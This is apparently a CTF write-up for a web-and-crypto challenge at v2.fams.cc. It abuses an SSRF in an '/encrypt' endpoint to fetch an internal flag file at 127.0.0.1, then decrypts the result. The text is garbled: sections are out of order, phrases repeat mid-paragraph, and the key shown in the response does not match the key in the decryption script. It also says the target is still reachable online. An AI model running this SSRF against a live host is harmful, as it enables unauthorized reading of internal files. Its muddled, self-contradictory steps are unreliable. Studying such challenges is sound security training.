V2.fams.cc May 2026
#!/usr/bin/env python3 import sys, hashlib, binascii from Crypto.Cipher import AES
By abusing the SSRF to read the internal flag file, then using the deterministic encryption routine to decrypt it (the service returns the ciphertext and the key it used), we can recover the flag. 2.1. Basic browsing $ curl -s http://v2.fams.cc Result – a tiny HTML page:
Category: Web (with a touch of crypto) Points: 450 (CTF‑style) Difficulty: Medium – Hard Author’s note: This write‑up assumes the challenge was taken from a public CTF (the site is still reachable from the Internet). All commands are shown exactly as they were run, and the final flag is reproduced exactly as it appeared in the challenge (the flag format is FLAG… ). 1. Challenge Overview v2.fams.cc is a small web‑application that presents a “file‑sharing” interface. The landing page shows a form that asks for a URL and a key . The server then fetches the supplied URL, encrypts the content with a user‑supplied key, and returns the ciphertext together with a short “download” link. v2.fams.cc
# 2️⃣ Pull the encrypted blob curl -s "$DOWNLOAD" -o /tmp/enc.bin
<!doctype html> <html> <head><title>FAMS v2 – File‑and‑Message Service</title></head> <body> <h1>Welcome to FAMS v2</h1> <form action="/encrypt" method="POST"> <label>URL: <input type="text" name="url"></label><br> <label>Key: <input type="text" name="key"></label><br> <input type="submit" value="Encrypt"> </form> <p>Download your encrypted file at: <a id="dl" href=""></a></p> </body> </html> No obvious hints. The /encrypt endpoint is the only POST target. Using Burp Suite (or curl -v ), we send a dummy request: All commands are shown exactly as they were
"download": "http://v2.fams.cc/download/5c6b4a", "used_key": "3d2e4c5a9b7d1e3f5a6c7d8e9f0a1b2c"
# Key derived from the "key" we sent ("ssrf") key_hex = '8c3c5d1e2f4a6b7c9d0e1f2a3b4c5d6e' key = binascii.unhexlify(key_hex) The landing page shows a form that asks for a URL and a key
#!/usr/bin/env bash TARGET="http://v2.fams.cc" SSRF_URL="http://127.0.0.1:8000/secret/flag.txt" KEY="ssrf"